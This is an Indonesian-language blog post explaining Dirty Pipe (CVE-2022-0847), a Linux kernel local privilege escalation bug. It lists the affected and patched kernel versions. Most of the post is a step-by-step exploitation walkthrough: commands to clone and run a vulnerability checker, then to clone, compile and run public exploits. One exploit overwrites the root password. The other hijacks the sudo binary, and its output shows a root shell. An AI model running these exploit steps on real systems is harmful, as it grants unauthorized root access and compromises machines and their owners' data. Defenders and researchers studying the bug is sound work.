Post

[CVE-2022-0847] DirtyPipe

Dirty Pipe (CVE-2022-0847) adalah kerentanan local privilege escalation pada kernel Linux yang memungkinkan user biasa untuk:

  • Modifikasi/overwrite file seperti /etc/passwd.
  • Mendapatkan shell root.

Versi kernel yang rentan

  • Kernel linux di atas versi 5.8 rentan.
  • Sejauh ini kerentanan ini telah di-patch pada versi ini:
    • 5.16.11
    • 5.15.25
    • 5.10.102

Tahap eksploitasi

Step 1: Cek versi kernel

1
2
3
4
5
6
7
8
9
# clone script
➜ git clone https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker
➜ cd CVE-2022-0847-dirty-pipe-checker
➜ chmod +x dpipe.sh

# cek dirty pipe pada versi yang digunakan saat ini
➜ ./dpipe.sh
# cek dirty pipe pada spesifik versi
➜ ./dpipe.sh 5.10.11

Step 2: Eksploitasi dirtypipe

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
# clone scirpt
https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits
cd CVE-2022-0847-DirtyPipe-Exploits
chmod +x compile.sh

# compile exploit
./compile.sh

# exploit 1 - mengubah password root menjadi "piped"
./exploit-1

# exploit 2 - hijack binary (contoh sudo untuk root)
➜ ./exploit-2 /usr/bin/sudo

[+] hijacking suid binary..
[+] dropping suid shell..
[+] restoring suid binary..
[+] popping root shell.. (dont forget to clean up /tmp/sh ;))
# whoami
root

Referensi

  • https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit
  • https://dirtypipe.cm4all.com/
  • https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker
This post is licensed under CC BY 4.0 by the author.